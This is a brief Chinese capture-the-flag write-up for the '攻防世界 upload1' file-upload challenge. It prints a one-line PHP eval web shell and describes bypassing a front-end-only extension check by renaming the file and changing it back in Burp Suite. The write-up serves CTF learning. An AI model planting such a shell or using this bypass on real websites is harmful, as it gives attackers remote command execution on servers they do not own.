攻防世界upload1

upload1

攻防世界upload1

进入环境就一个上传,我们先上传一个普通的木马文件看看

木马内容

<?php @eval($_POST["cmd"]); ?>

攻防世界upload1

估计是前端校验我们查看源码

攻防世界upload1

只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可

攻防世界upload1

攻防世界upload1

然后访问木马文件执行指令即可

攻防世界upload1

攻防世界upload1

攻防世界upload1

执行后查看源码便发现flag

攻防世界upload1

上一篇:跨境电商直播实时字幕,如何做到 “实时”?


下一篇:围观双 11,是谁在支撑薇娅和李佳琦的直播间?